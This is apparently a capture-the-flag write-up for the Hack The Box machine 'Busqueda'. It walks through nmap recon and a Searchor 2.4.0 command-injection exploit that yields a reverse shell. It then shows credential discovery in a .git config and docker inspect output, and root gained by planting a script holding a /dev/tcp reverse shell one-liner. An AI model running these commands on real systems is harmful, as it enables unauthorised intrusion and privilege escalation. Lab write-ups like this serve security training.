# RECON
## INITIAL NMAP SCAN
```nmap
┌──(kali㉿kali)-[~/ctf/busqueda]
└─$ nmap 10.10.11.208     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-12 04:07 EDT
Nmap scan report for 10.10.11.208
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

```

## SERVICE NMAP SCAN
```sh
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

# ENUMERATION
## Web
- The web function by letting user select an search engine and query, if we select the redirect option, it will redirect us to the page. If not it just puts the URL in the page.
- We see the server is powered by Flask and Searchor 2.4.0

# EXPLOITATION
- Searching online, seems like  the package `Searchor 2.4.0` is vulnerable to CMD injection.
- We can get this made [exploit](https://raw.githubusercontent.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/main/exploit.sh) Which simply just POST our command to the web server.
```sh
┌──(kali㉿kali)-[~/ctf/busqueda]
└─$ ./exploit.sh searcher.htb 10.10.17.59
---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
[*] Input target is searcher.htb
[*] Input attacker is 10.10.17.59:9001
[*] Run the Reverse Shell... Press Ctrl+C after successful connection

```
```sh
(remote) svc@busqueda:/var/www/app$ whoami
svc
```

# Internal Enumeration
- Currently user `svc`, need password for `sudo`
- Interestingly, we find `.git` folder in `/var/www/app` directory with the file `config` with credentials.
```sh
(remote) svc@busqueda:/var/www/app/.git$ cat config 
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

```
- Checking `/home` there's no other users other than cody, we can try the password for our user.
```sh
(remote) svc@busqueda:/var/www/app/.git$ sudo -l
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
```
# Privilege Escalation
- Checking the script, we see some interesting arguments we can do
```sh
(remote) svc@busqueda:/opt/scripts$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py 
Sorry, user svc is not allowed to execute '/usr/bin/python3 /opt/scripts/system-checkup.py' as root on busqueda.
(remote) svc@busqueda:/opt/scripts$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py -h
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

(remote) svc@busqueda:/opt/scripts$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS             PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   7 months ago   Up About an hour   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   7 months ago   Up About an hour   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

```

```sh
--format={"Hostname":"960873171e2e","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["USER_UID=115","USER_GID=121","GITEA__database__DB_TYPE=mysql","GITEA__database__HOST=db:3306","GITEA__database__NAME=gitea","GITEA__database__USER=gitea","GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"gitea/gitea:latest","Volumes":{"/data":{},"/etc/localtime":{},"/etc/timezone":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"docker","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/scripts/docker","com.docker.compose.service":"server","com.docker.compose.version":"1.29.2","maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

```
- After cheating a bit by looking at the forum, we're actually running docker inspect, and we can use --format to drop some config as seen above.
```sh
(remote) svc@busqueda:/opt/scripts$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' gitea 
```
- We found a password `yuiu1hoiu4i5ho1uh`, if we check on `gitea.searcher.htb`, we see there's a user administrator there. We can login with that account on gitea and we can read the scripts.
- After reading for about an hour, I missed this stupid thing.
```sh
`elif action == 'full-checkup':`

`try:`

`arg_list = ['./full-checkup.sh']`

`print(run_command(arg_list))`

`print('[+] Done!')`

`except:`

`print('Something went wrong')`

`exit(1)`
```
- As you can see the arg_list uses the relative path of `full-checkup.sh` instead of the one in `/opt/scripts`. Meaning we can create our own `full-checkup.sh`
```sh
#!/bin/bash
sh -i >& /dev/tcp/10.10.17.59/9002 0>&1

```
- Then we just run as normal
```sh
(remote) svc@busqueda:/dev/shm$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
^CSomething went wrong
```
```sh
(remote) root@busqueda:/dev/shm# whoami
root
```

# Conclusion
- This is very relatively easy box for foothold. Root was not that tough but I kinda missed it. Also the Docker was quite new to me as I don't interact with docker that muhc.